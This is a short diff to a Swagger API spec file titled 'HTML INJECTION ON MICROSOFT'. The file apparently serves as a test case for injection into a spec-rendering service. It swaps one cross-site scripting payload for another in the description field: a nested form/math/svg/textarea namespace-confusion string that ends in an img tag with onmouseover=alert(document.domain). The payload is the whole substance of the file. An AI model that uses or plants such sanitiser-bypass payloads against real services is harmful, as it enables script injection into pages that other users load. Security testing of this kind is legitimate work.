--- a/test.yaml
+++ b/test.yaml
@@ -2,7 +2,7 @@ swagger: '2.0'
 info:
   title: HTML INJECTION ON MICROSOFT
   description: |
-    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">"></form>
+    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onmouseover=alert(document.domain) src=1>"></form>
 
   version: production
 basePath: /JSSResource/
